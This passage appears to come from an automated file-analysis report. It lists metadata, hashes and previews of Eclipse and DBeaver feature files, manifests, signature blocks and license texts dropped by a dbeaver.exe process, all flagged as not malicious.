      SHA-512:932F92D043C884AFB78AC24BBC232E5919C4C7594189A0BA744A3D1E1C1CE4673AF6E14BD1C2C88A9E2D69A76992F2017EB41AC23889CADA558C8C550D2F9F95
      Malicious:false
      Reputation:unknown
      Preview:<?xml version="1.0" encoding="UTF-8"?>.<feature. id="org.eclipse.equinox.p2.discovery.feature". label="%featureName". version="1.3.200.v20231104-1339". provider-name="%providerName">.. <description>. %description. </description>.. <copyright>. %copyright. </copyright>.. <license url="%licenseURL">. %license. </license>.. <plugin. id="org.eclipse.equinox.p2.discovery". version="1.3.100.v20230728-2010"/>.. <plugin. id="org.eclipse.equinox.p2.discovery.compatibility". version="1.3.100.v20230728-2010"/>.. <plugin. id="org.eclipse.equinox.p2.ui.discovery". version="1.3.100.v20230718-0609"/>..</feature>.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:data
      Category:dropped
      Size (bytes):9555
      Entropy (8bit):7.574674232025935
      Encrypted:false
      SSDEEP:
      MD5:8103FC8735EF2B5661CBBB6D7F688857
      SHA1:BE953A636EC27A819E079F105F5D0157AEA72C4B
      SHA-256:B3A82141ED177D50418F02F8F015E322428D050B2E825766006D6BED868721D8
      SHA-512:0B368C9136B586AF6EC8ACF7183BF3C98261E4941D32DE5DAC04084C7AAC6124C4D0E3B8867C42EA60D2552CAFF357B27F674884F6D6509AB89D72FADDC7E2C3
      Malicious:false
      Reputation:unknown
      Preview:0.%O..*.H........%@0.%<...1.0...`.H.e......0...*.H..........0...0..x..........W..!2.9...wu\0...*.H........0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G40...130801120000Z..380115120000Z0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G40.."0...*.H.............0..........sh..]J<0"0i3..%..!=..Y..).=X.v..{....0....8..V.m...y....._..<R.R....~...W.YUr.h.p..u.js2...D.......t;mq.-... .. .c)-..^N..!a.4...^.[......4@_.zf.w.H.fWW.TX..+.O.0.V..{]..O^.5.1..^......@.y.x...j.8.....7...}...>..p.U.A2...s*n..|!L....u]xf.:1D.3@...ZI...g.'..O9..X..$\F.d..i.v.v=Y]Bv...izH....f.t..K...c....:.=...E%...D.+~....am.3...K...}....!........p,A`..c.D..vb~.....d.3....C....w.....!..T)%.l..RQGt.&..Au.z._.?..A..[..P.1..r."..|Lu?c.!_. Qko....O..E_. ........~.&...i/..-............B0@0...U.......0....0...U...........0...U..........q]dL..g?....O0...*.H..............a.}.l.........dh.V.w.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):568
      Entropy (8bit):5.847873145205361
      Encrypted:false
      SSDEEP:
      MD5:5BFD846FA3023486ADCE6918564D25AE
      SHA1:F5892CBE362DAAB6A1AF9D0717E36BDED8005C5D
      SHA-256:F7A1EE2CE80A572CA3C6DA71F6BF005D8F43E4CFA5E33F52BC6E7674BA1F3036
      SHA-512:71A651E7128CBEE51F4CE7FD66349855CDD0CBE527B35FE2BA2E0637C52F9A2FA8EC017BABA545306AFCAEBCD975F9701CA22E835A7C305D2B19D9D285FE3B84
      Malicious:false
      Reputation:unknown
      Preview:Signature-Version: 1.0..Created-By: 11.0.18 (Eclipse Adoptium)..SHA-256-Digest-Manifest: ilDldP+wWg9YkwqYiARvhAxn60CCHS9kyGBAuZ65efI=..SHA-256-Digest-Manifest-Main-Attributes: rno6v0Aj7cN+fCL6AZjQqJ/DhhApnvh.. 3JhJf/KjlzXc=....Name: epl-2.0.html..SHA-256-Digest: AED4dAeGrOY0hc5nW8gJmyCMPlZ5rTF8ACL9TK1dx/Q=....Name: feature.xml..SHA-256-Digest: vj0QRL9GYelLJld0zMzITaYDEU+AUB/IF0OriAvqMzo=....Name: feature.properties..SHA-256-Digest: 1JalINp6VlW+/RISES7/2qtbHC8QDZoKsiW4uWuNF5o=....Name: license.html..SHA-256-Digest: zVM/vJgU0kRLZDQ3qmgeRgMh5WQ38NzJh/8vJedLd0s=....
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):420
      Entropy (8bit):5.7657760215791445
      Encrypted:false
      SSDEEP:
      MD5:946295895DA8A5B084B202301AB4F81C
      SHA1:1ADC549ACD8BF19BDC68914769F1CBCE093EF184
      SHA-256:8A50E574FFB05A0F58930A9888046F840C67EB40821D2F64C86040B99EB979F2
      SHA-512:7FC7E60275045BD66FE57E9713B03D57CBAED64CBD6FBB35C6AEC574AC7C1A25807746D425A92D74C00AC0664F7F6731254C893B3D77FD1B5F5C80535FF8C163
      Malicious:false
      Reputation:unknown
      Preview:Manifest-Version: 1.0..Created-By: Maven Archiver 3.6.1..Build-Jdk-Spec: 17....Name: epl-2.0.html..SHA-256-Digest: koxKavfpz4JYnlYPmP+7at5zhbWf7Iy07zamu5HPcBg=....Name: feature.xml..SHA-256-Digest: mmj9BTB/zw7Ua0a/jybjLGXKAjCshh4XvkVfUbIItIw=....Name: feature.properties..SHA-256-Digest: eT5fyv5h4OW0kz5SFjcYvfwNB6DGRT7fH9HvIRTmqaA=....Name: license.html..SHA-256-Digest: Dv5NbrV590iFepPFp4HDAA9w8zkHSynRW5FCE+FLHVM=....
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:HTML document, ASCII text
      Category:dropped
      Size (bytes):17300
      Entropy (8bit):4.684851896409418
      Encrypted:false
      SSDEEP:
      MD5:84283FA8859DAF213BDDA5A9F8D1BE1D
      SHA1:0CBEF63AEBCFCD4CD201EBEB48CE294E377A6321
      SHA-256:928C4A6AF7E9CF82589E560F98FFBB6ADE7385B59FEC8CB4EF36A6BB91CF7018
      SHA-512:F4EB2BB38FA8C40B44C714E05B518DED3641529D689552B131613A40A64940D0369263F3AFDE03A7D289DD88E38C50975527103FC43EB32984E84E8236AB9FEB
      Malicious:false
      Reputation:unknown
      Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">.<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">. <head>. <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />. <title>Eclipse Public License - Version 2.0</title>. <style type="text/css">. body {. margin: 1.5em 3em;. }. h1{. font-size:1.5em;. }. h2{. font-size:1em;. margin-bottom:0.5em;. margin-top:1em;. }. p {. margin-top: 0.5em;. margin-bottom: 0.5em;. }. ul, ol{. list-style-type:none;. }. </style>. </head>. <body>. <h1>Eclipse Public License - v 2.0</h1>. <p>THE ACCOMPANYING PROGRAM IS PROVIDED UNDER THE TERMS OF THIS ECLIPSE. PUBLIC LICENSE (&ldquo;AGREEMENT&rdquo;). ANY USE, REPRODUCTION OR DISTRIBUTION. OF THE PROGRAM CONSTITUTES RECIPIENT&#039;S ACCEPTANCE OF THIS AGREEMENT.. </p>. <h2 id="def
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text
      Category:dropped
      Size (bytes):10034
      Entropy (8bit):5.034208874700594
      Encrypted:false
      SSDEEP:
      MD5:FEC75C81CA585EC551A5BEDB1ABD8BF2
      SHA1:3710D94E9BD7DD7A242C7EE0AE06E0C4C00E3BA6
      SHA-256:793E5FCAFE61E0E5B4933E52163718BDFC0D07A0C6453EDF1FD1EF2114E6A9A0
      SHA-512:F33D45E23F1583AEDD5003361486D32EF2C70789998E6F7E4E38CF674BE865CAA00B9A9B7646CE68EB1FB5A0AFAA1FEDEE4C6CE6B5FA924DBF7022E471810867
      Malicious:false
      Reputation:unknown
      Preview:###############################################################################.# Copyright (c) 2010, 2013 EclipseSource Inc. and others..#.# This program and the accompanying materials.# are made available under the terms of the Eclipse Public License 2.0.# which accompanies this distribution, and is available at.# https://www.eclipse.org/legal/epl-2.0/.#.# SPDX-License-Identifier: EPL-2.0.# .# Contributors:.# EclipseSource - initial API and implementation.###############################################################################.# feature.properties.# contains externalized strings for feature.xml.# "%foo" in feature.xml corresponds to the key "foo" in this file.# java.io.Properties file (ISO 8859-1 with "\" escapes).# This file should be translated...# "featureName" property - name of the feature.featureName=Equinox p2, backward compatibility support..# "providerName" property - name of the company that provides the feature.providerName=Eclipse.org - Equinox..description=Pro
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:XML 1.0 document, ASCII text
      Category:dropped
      Size (bytes):1245
      Entropy (8bit):4.697782258101679
      Encrypted:false
      SSDEEP:
      MD5:1BBFB77434A31348A6D5DF95EAB44500
      SHA1:73FFC3FA5758D30A50D68CC6B1818050DF2A81B4
      SHA-256:9A68FD05307FCF0ED46B46BF8F26E32C65CA0230AC861E17BE455F51B208B48C
      SHA-512:62DAE75F1AB015C67F68DF8AA18CCFC70999507F61394F0E9D3ECB187BEA979E424DD1EF7D1F5EDB9BD081B69467FE6BFE500305B4F8C14B6BB59E0EA402DBBD
      Malicious:false
      Reputation:unknown
      Preview:<?xml version="1.0" encoding="UTF-8"?>.<feature. id="org.eclipse.equinox.p2.extras.feature". label="%featureName". version="1.4.2200.v20231112-1314". provider-name="%providerName">.. <description>. %description. </description>.. <copyright>. %copyright. </copyright>.. <license url="%licenseURL">. %license. </license>.. <includes. id="org.eclipse.equinox.p2.core.feature". version="1.7.0.v20231112-1314"/>.. <plugin. id="org.eclipse.equinox.p2.director.app". version="1.3.200.v20231103-0929"/>.. <plugin. id="org.eclipse.equinox.p2.directorywatcher". version="1.4.200.v20230921-2011"/>.. <plugin. id="org.eclipse.equinox.p2.reconciler.dropins". version="1.5.200.v20230921-2011"/>.. <plugin. id="org.eclipse.equinox.p2.publisher". version="1.9.0.v20230921-2011"/>.. <plugin. id="org.eclipse.equinox.p2.extensionlocation". version="1.5.200.v20230
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:data
      Category:dropped
      Size (bytes):9555
      Entropy (8bit):7.567686089295998
      Encrypted:false
      SSDEEP:
      MD5:9DDAA4C6D74726516B5948C516B73DF2
      SHA1:6ECB86E121216141208459B7F9675EA09F84B9F7
      SHA-256:15396D7633D5E793E0B49700359D7775CF4EE66000D7A1099B488F9A2CF9F964
      SHA-512:361A0D7AA6983C20C43002517520F479919972E7B58FD98A61D9AC88257B57B12160F650CE90EF9B60FC6E77B78C0768EAAD884F85CF3C8108C232183A0C3141
      Malicious:false
      Reputation:unknown
      Preview:0.%O..*.H........%@0.%<...1.0...`.H.e......0...*.H..........0...0..x..........W..!2.9...wu\0...*.H........0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G40...130801120000Z..380115120000Z0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G40.."0...*.H.............0..........sh..]J<0"0i3..%..!=..Y..).=X.v..{....0....8..V.m...y....._..<R.R....~...W.YUr.h.p..u.js2...D.......t;mq.-... .. .c)-..^N..!a.4...^.[......4@_.zf.w.H.fWW.TX..+.O.0.V..{]..O^.5.1..^......@.y.x...j.8.....7...}...>..p.U.A2...s*n..|!L....u]xf.:1D.3@...ZI...g.'..O9..X..$\F.d..i.v.v=Y]Bv...izH....f.t..K...c....:.=...E%...D.+~....am.3...K...}....!........p,A`..c.D..vb~.....d.3....C....w.....!..T)%.l..RQGt.&..Au.z._.?..A..[..P.1..r."..|Lu?c.!_. Qko....O..E_. ........~.&...i/..-............B0@0...U.......0....0...U...........0...U..........q]dL..g?....O0...*.H..............a.}.l.........dh.V.w.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):568
      Entropy (8bit):5.842567673519046
      Encrypted:false
      SSDEEP:
      MD5:8BA7E9BA0911B0F405ED0CD07F7E741B
      SHA1:6A7BEAC4426E24166F25C008B21B37A8B076FF5F
      SHA-256:74DAF42DB839661EF7A5AACBEAC07818282279BA0FF3B1D1BED7C238AE2715C0
      SHA-512:676890FC09A8A9478D690B508727660DF2CF1B0E205583937A84EBC8A71C01676D96BD34A3903A563A0D989D7E6496F372786990EC37E92298B0F565AD172A3B
      Malicious:false
      Reputation:unknown
      Preview:Signature-Version: 1.0..Created-By: 11.0.21 (Eclipse Adoptium)..SHA-256-Digest-Manifest: ybjPdVZm0kyQ0UfUElAm14+Qe07ZDw1mJPvdTQXrpHQ=..SHA-256-Digest-Manifest-Main-Attributes: rno6v0Aj7cN+fCL6AZjQqJ/DhhApnvh.. 3JhJf/KjlzXc=....Name: epl-2.0.html..SHA-256-Digest: AED4dAeGrOY0hc5nW8gJmyCMPlZ5rTF8ACL9TK1dx/Q=....Name: feature.xml..SHA-256-Digest: Hhsmmp14BCXHcAyYc8toWjS98Uu0FpXAyD99bQYBjL8=....Name: feature.properties..SHA-256-Digest: FF0Kych97t00Lf6JhBoWMMI0Zhj9Ow920hlEr+yWiv8=....Name: license.html..SHA-256-Digest: zVM/vJgU0kRLZDQ3qmgeRgMh5WQ38NzJh/8vJedLd0s=....
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):420
      Entropy (8bit):5.733133132362383
      Encrypted:false
      SSDEEP:
      MD5:952CD94E72A760181EB23CFF2C1D6121
      SHA1:C895BF82585C510746A9CC315CE111D296CFF795
      SHA-256:C9B8CF755666D24C90D147D4125026D78F907B4ED90F0D6624FBDD4D05EBA474
      SHA-512:3556B2EC3086ACEF340E0ACB00F874A24AC9E34E885F192C0FAC87BDA9998DF5EDDC73CEC7919093D5356BA5FB42E54BB8094552F33D500415462B2582C10963
      Malicious:false
      Reputation:unknown
      Preview:Manifest-Version: 1.0..Created-By: Maven Archiver 3.6.1..Build-Jdk-Spec: 17....Name: epl-2.0.html..SHA-256-Digest: koxKavfpz4JYnlYPmP+7at5zhbWf7Iy07zamu5HPcBg=....Name: feature.xml..SHA-256-Digest: iPsfzv30Kyaab6ot7dMr7OSuJRXLkxiarnN9pJ7fDw8=....Name: feature.properties..SHA-256-Digest: Yuwowlrk7wzSPDWKK4ZMT7Ajybhp+BOFLg2ri3ppGR8=....Name: license.html..SHA-256-Digest: Dv5NbrV590iFepPFp4HDAA9w8zkHSynRW5FCE+FLHVM=....
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text
      Category:dropped
      Size (bytes):10127
      Entropy (8bit):5.030173741222018
      Encrypted:false
      SSDEEP:
      MD5:D8FCC6FB5C9EFC4EFC48429B541CDD2F
      SHA1:261A1CDD08014D53F28D4032F29A7D086D500444
      SHA-256:62EC28C25AE4EF0CD23C358A2B864C4FB023C9B869F813852E0DAB8B7A69191F
      SHA-512:C600D29B030AA6EAC35719FBE5E1470EDC844CF986F96C01D7D272CC05571C343B1896AB0B576067F0D3ACD3E9914BB573BE070B547A76D71BD48E962AF7E88F
      Malicious:false
      Reputation:unknown
      Preview:###############################################################################.# Copyright (c) 2000, 2013 IBM Corporation and others..#.# This program and the accompanying materials.# are made available under the terms of the Eclipse Public License 2.0.# which accompanies this distribution, and is available at.# https://www.eclipse.org/legal/epl-2.0/.#.# SPDX-License-Identifier: EPL-2.0.# .# Contributors:.# IBM Corporation - initial API and implementation.###############################################################################.# feature.properties.# contains externalized strings for feature.xml.# "%foo" in feature.xml corresponds to the key "foo" in this file.# java.io.Properties file (ISO 8859-1 with "\" escapes).# This file should be translated...# "featureName" property - name of the feature.featureName=Eclipse RCP..# "providerName" property - name of the company that provides the feature.providerName=Eclipse.org..# "updateSiteName" property - label for the update site.u
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:XML 1.0 document, ASCII text
      Category:dropped
      Size (bytes):1062
      Entropy (8bit):4.596724511620038
      Encrypted:false
      SSDEEP:
      MD5:11BAA97D532ED0821BCCBEA45E29A837
      SHA1:2545E2E6788755E515A1B77604DA787946051F5B
      SHA-256:88FB1FCEFDF42B269A6FAA2DEDD32BECE4AE2515CB93189AAE737DA49EDF0F0F
      SHA-512:7C2B8A2347317A965C610171E0258A69F0B05C09BEE134A4DDDD2513A1EA461CF0DBF0A89DC0FD9676243370018F5BD02FAC69BF0E2AC95D9583C1E463B6D58B
      Malicious:false
      Reputation:unknown
      Preview:<?xml version="1.0" encoding="UTF-8"?>.<feature. id="org.eclipse.rcp". label="%featureName". version="4.30.0.v20231201-0512". provider-name="%providerName". plugin="org.eclipse.rcp">.. <description>. %description. </description>.. <copyright>. %copyright. </copyright>.. <license url="%licenseURL">. %license. </license>.. <includes. id="org.eclipse.e4.rcp". version="4.30.0.v20231113-1355"/>.. <plugin. id="org.eclipse.help". version="3.10.200.v20231106-1240"/>.. <plugin. id="org.eclipse.ui". version="3.205.0.v20230922-1312"/>.. <plugin. id="org.eclipse.ui.workbench". version="3.131.0.v20231201-0512"/>.. <plugin. id="org.eclipse.update.configurator". version="3.5.200.v20231102-0934"/>.. <plugin. id="org.eclipse.rcp". version="4.30.0.v20231201-0110"/>.. <plugin. id="org.eclipse.ui.cocoa". os="macosx". ws="c
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:data
      Category:dropped
      Size (bytes):11932
      Entropy (8bit):7.674502914637048
      Encrypted:false
      SSDEEP:
      MD5:899ACF0FD0BF00CA02EF71A6416834A6
      SHA1:F126542DDB20E72A7A71F0F8FE4FFDCABBB84C23
      SHA-256:5522595494090C836E4072DBEAF79070B7FB847DD2E636937F6024A25F56E0BF
      SHA-512:C43990E919186470CB013C81BAB3063EA29441990C77834C17377684FFE6396BD561F0C95CDBD6F52E29847C47FC057DBD744C8982FF4E85E46446BA2930961B
      Malicious:false
      Reputation:unknown
      Preview:0.....*.H..........0......1.0...`.H.e......0...*.H..........0...0..x..........W..!2.9...wu\0...*.H........0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G40...130801120000Z..380115120000Z0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G40.."0...*.H.............0..........sh..]J<0"0i3..%..!=..Y..).=X.v..{....0....8..V.m...y....._..<R.R....~...W.YUr.h.p..u.js2...D.......t;mq.-... .. .c)-..^N..!a.4...^.[......4@_.zf.w.H.fWW.TX..+.O.0.V..{]..O^.5.1..^......@.y.x...j.8.....7...}...>..p.U.A2...s*n..|!L....u]xf.:1D.3@...ZI...g.'..O9..X..$\F.d..i.v.v=Y]Bv...izH....f.t..K...c....:.=...E%...D.+~....am.3...K...}....!........p,A`..c.D..vb~.....d.3....C....w.....!..T)%.l..RQGt.&..Au.z._.?..A..[..P.1..r."..|Lu?c.!_. Qko....O..E_. ........~.&...i/..-............B0@0...U.......0....0...U...........0...U..........q]dL..g?....O0...*.H..............a.}.l.........dh.V.w.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):396
      Entropy (8bit):5.833057976073712
      Encrypted:false
      SSDEEP:
      MD5:6452E80EFAFB3B751268100BEA04D640
      SHA1:28ADE4EDD67E633EAE19F0D164B45CDF834A54A6
      SHA-256:9CAAD513DE51DF3764A23E44079255CEBC0507E95C56AB8A917E9D8FD0B38D11
      SHA-512:9ADE1FC7B5081D29680A74D7DCE637D3010BF53B120C9B022740EB596AD5E305E78A059DFEF142C13A9A7CA3466AE486AEDF56DBD3644DD16C45217C9A11A7F9
      Malicious:false
      Reputation:unknown
      Preview:Signature-Version: 1.0..Created-By: 17.0.9 (Private Build)..SHA-256-Digest-Manifest: XfjejC+z/pzIctQmzENgkYVuW26CrCCZOpqjLC9Xlsw=..SHA-256-Digest-Manifest-Main-Attributes: oFu1MrphNLFMMhK62/+IJZUZ+NWhyyy.. VG88sfgEJhYY=....Name: feature.xml..SHA-256-Digest: fba7Jr6C3yqyZSfYr70zh3CELp9AUU9v4pOfyTRh8Mk=....Name: feature.properties..SHA-256-Digest: g7zr0mD23ogHCq14WHsbfRVu9R8K4/4mrregvwQwHFc=....
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):290
      Entropy (8bit):5.558707653775785
      Encrypted:false
      SSDEEP:
      MD5:2474F6E4789CCEBAB28ABFDCBBA539B7
      SHA1:4AD8FE6DBEC86E9A3E53688EBED4EB8CFD0273AC
      SHA-256:5DF8DE8C2FB3FE9CC872D426CC436091856E5B6E82AC20993A9AA32C2F5796CC
      SHA-512:0F68185FE1F1340F1ADB9AB1B015A8232C7FF4970886A242315D0B0815C7413AE7A8D2BF27B67EB23F713A9DE7148BD41AA12F3470794983AB26B3E03E13218C
      Malicious:false
      Reputation:unknown
      Preview:Manifest-Version: 1.0..Build-Jdk-Spec: 17..Build-Time: 202403031740..Built-By: dbeaver.io..Created-By: dbeaver.io....Name: feature.xml..SHA-256-Digest: 1jj3yusAikuxk3e2hote2ZB9fxPPm9deOxm69wXSwlM=....Name: feature.properties..SHA-256-Digest: ODkI0/i5XL30Ac5OZ4HcR8Hnoff35vo+YtRilqEBYto=....
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text
      Category:dropped
      Size (bytes):12215
      Entropy (8bit):4.508268831914743
      Encrypted:false
      SSDEEP:
      MD5:9A0D9BC3CCF34D0B26E43B6855C24E35
      SHA1:F41CE7E7C7062475D985DDC50C8B9B104919BD0B
      SHA-256:383908D3F8B95CBDF401CE4E6781DC47C1E7A1F7F7E6FA3E62D46296A10162DA
      SHA-512:A48130432DFDB4D48884F4AB7AD250FFCDE08B0A40C62EA940915EF9AA2E7A36C24D0AFF4B00B2E6CC914A0BC1C6869E71BD1A4A8D1F451729C9A7560DE2FD79
      Malicious:false
      Reputation:unknown
      Preview:featureName=DBeaver Base Standalone Application.providerName=DBeaver Corp.description=DBeaver Universal Database Manager base standalone application..copyright=\u00A9 2010-2024, DBeaver Corp.licenseURL=https://dbeaver.io/product/dbeaver_license.txt.license=\. Apache License\n\. Version 2.0, January 2004\n\. http://www.apache.org/licenses/\n\.\n\. TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION\n\.\n\. 1. Definitions.\n\.\n\. "License" shall mean the terms and conditions for use, reproduction,\n\. and distribution as defined by Sections 1 through 9 of this document.\n\.\n\. "Licensor" shall mean the copyright owner or entity authorized by\n\. the copyright owner that is granting the License.\n\.\n\. "Legal Entity" shall mean the union of the acting entity and all\n\. other entities that control, are controlled by, or are under common\n\. control with that
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:XML 1.0 document, ASCII text
      Category:dropped
      Size (bytes):1528
      Entropy (8bit):4.930876944883237
      Encrypted:false
      SSDEEP:
      MD5:FBEB62B8D8D79325DC9B17D633EE563A
      SHA1:3014EA5EF250C09FC17FD8B4C2355BE0CCBC7081
      SHA-256:D638F7CAEB008A4BB19377B6868B5ED9907D7F13CF9BD75E3B19BAF705D2C253
      SHA-512:D4F7035E3BE1CC12201FD80603CED233C7A3AA2797B94BDEB951D132F9561C667C1CCAEFE5A28B32826297B1B71AFBDEF73AD7A10042D1ADB5008675F8118FD1
      Malicious:false
      Reputation:unknown
      Preview:<?xml version="1.0" encoding="UTF-8"?>. Base for standalone applications. Includes minimum set of plugins -->.<feature. id="org.jkiss.dbeaver.app.base.feature". label="%featureName". version="24.0.0.202403031740". provider-name="%providerName". plugin="org.jkiss.dbeaver.ui.app.standalone">.. <description>. %description. </description>.. <copyright>. %copyright. </copyright>.. <license url="%licenseURL">. %license. </license>.. <url>. <update label="DBeaver Universal Database Manager" url="https://dbeaver.io/"/>. </url>.. <includes id="org.jkiss.dbeaver.rcp.feature" version="3.0.5.202403031740"/>.. <includes id="org.jkiss.dbeaver.runtime.feature" version="24.0.0.202403031740"/>. <includes id="org.jkiss.dbeaver.ui.feature" version="24.0.0.202403031740"/>. <includes id="org.jkiss.dbeaver.db.feature" version="1.0.117.202403031740"/>. <includes id="org.jkiss.dbeaver.db.ui.feature" versi
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:data
      Category:dropped
      Size (bytes):11930
      Entropy (8bit):7.672208366712895
      Encrypted:false
      SSDEEP:
      MD5:2803F4537134D90D62E976F12DE2BBDB
      SHA1:E7DE90B47A091A60C68F880E98107B848BC48091
      SHA-256:DB94681D014BB228BACDAA0873068CCE328C221C43B600F4E290E15C6677B98E
      SHA-512:5B8669C7D6FE56B772223B47D09882748943789444F52CF54742638C6A7ED7D5022D0AC608418FDE7F14FA1DB823039B2CE0D8AD218426A68EB0F48A6A13DB69
      Malicious:false
      Reputation:unknown
      Preview:0.....*.H..........0......1.0...`.H.e......0...*.H..........0...0..x..........W..!2.9...wu\0...*.H........0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G40...130801120000Z..380115120000Z0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G40.."0...*.H.............0..........sh..]J<0"0i3..%..!=..Y..).=X.v..{....0....8..V.m...y....._..<R.R....~...W.YUr.h.p..u.js2...D.......t;mq.-... .. .c)-..^N..!a.4...^.[......4@_.zf.w.H.fWW.TX..+.O.0.V..{]..O^.5.1..^......@.y.x...j.8.....7...}...>..p.U.A2...s*n..|!L....u]xf.:1D.3@...ZI...g.'..O9..X..$\F.d..i.v.v=Y]Bv...izH....f.t..K...c....:.=...E%...D.+~....am.3...K...}....!........p,A`..c.D..vb~.....d.3....C....w.....!..T)%.l..RQGt.&..Au.z._.?..A..[..P.1..r."..|Lu?c.!_. Qko....O..E_. ........~.&...i/..-............B0@0...U.......0....0...U...........0...U..........q]dL..g?....O0...*.H..............a.}.l.........dh.V.w.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):396
      Entropy (8bit):5.781772070025586
      Encrypted:false
      SSDEEP:
      MD5:3C005347D445F4496BCB488B91514E5F
      SHA1:268AB27DAEC02A9813B3AE410960C4C7D955A1E3
      SHA-256:F17428E8F840DF40E319BDD0C10B2B847B7218F67341C3AA88074D9338DC0E06
      SHA-512:EBEC69E900091033FA642160C65F0C2F52446C560228B2C359D550A10A49B8F8676D0B48314156148EF786BD5721DE7F4FD0E04B716D3F4FB7185D45B8A0DAD1
      Malicious:false
      Reputation:unknown
      Preview:Signature-Version: 1.0..Created-By: 17.0.9 (Private Build)..SHA-256-Digest-Manifest: 8bdVErnzS5dC4gs+i/8/0eUNSWD8Wz6CRFOb1beMifE=..SHA-256-Digest-Manifest-Main-Attributes: oFu1MrphNLFMMhK62/+IJZUZ+NWhyyy.. VG88sfgEJhYY=....Name: feature.xml..SHA-256-Digest: kHCT1sMQXnyaes/tkGjS4YEc3N6By2MUCN3SIXwy5Ew=....Name: feature.properties..SHA-256-Digest: sDTWdjAqBsNgf53wJxi2tPTeak0TSkhKCm7d49d4H8M=....
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):290
      Entropy (8bit):5.637812663930331
      Encrypted:false
      SSDEEP:
      MD5:207E957C73CB6A9C0946AE07AC245B52
      SHA1:C4764DFE4E64DF5EFD27557681F164D634084A72
      SHA-256:F1B75512B9F34B9742E20B3E8BFF3FD1E50D4960FC5B3E8244539BD5B78C89F1
      SHA-512:2D3394F2E91107DC4F95AC7278582BE50781DEE29EBDC05DC68FCFD7E967E182E1ABD0B3791D7E4E49ADEACF0B3DB41CAFF22852C07FBBFF28ACE498B15CA58C
      Malicious:false
      Reputation:unknown
      Preview:Manifest-Version: 1.0..Build-Jdk-Spec: 17..Build-Time: 202403031740..Built-By: dbeaver.io..Created-By: dbeaver.io....Name: feature.xml..SHA-256-Digest: 6/QYPvW5O1PIBbXqgK/jaSrEk+KgN8G73//JDmII4/0=....Name: feature.properties..SHA-256-Digest: jzdSb0mOS4i+YfL7LoingtqMxWIZvJd8GNdE3aIVi7Y=....
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text
      Category:dropped
      Size (bytes):75
      Entropy (8bit):4.300252571143407
      Encrypted:false
      SSDEEP:
      MD5:6EE8CFAF49E055F0B1A7CED0B1810730
      SHA1:A71ED418DD19BC606A801129708E4FD225453F93
      SHA-256:8F37526F498E4B88BE61F2FB2E88A782DA8CC56219BC977C18D744DDA2158BB6
      SHA-512:13C67631BFFA1941C22B56C90E2A668DD8174E7B2071181CC865CE493F83863748968B16DE3E3F3849B5D1B10D0D6D4DC832385ADCDF9A5F725BAD8AD0DCD6C4
      Malicious:false
      Reputation:unknown
      Preview:featureName=DBeaver Local Standalone Application.providerName=DBeaver Corp.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:XML 1.0 document, ASCII text
      Category:dropped
      Size (bytes):558
      Entropy (8bit):4.93951202488013
      Encrypted:false
      SSDEEP:
      MD5:4693DBA992030E66F12FE9C8712AE522
      SHA1:D39A65ACE53AC877153439A3F3B1BBCDB6C2E7A0
      SHA-256:EBF4183EF5B93B53C805B5EA80AFE3692AC493E2A037C1BBDFFFC90E6208E3FD
      SHA-512:10657C358B052A54F25EAB7349B8298F5D0709EE9ED5D50A390F18467A6B044DC7FBFDBBF633F929D3B81758A8D8148FBDA4B2E53D55BA78411C065FCA520BC8
      Malicious:false
      Reputation:unknown
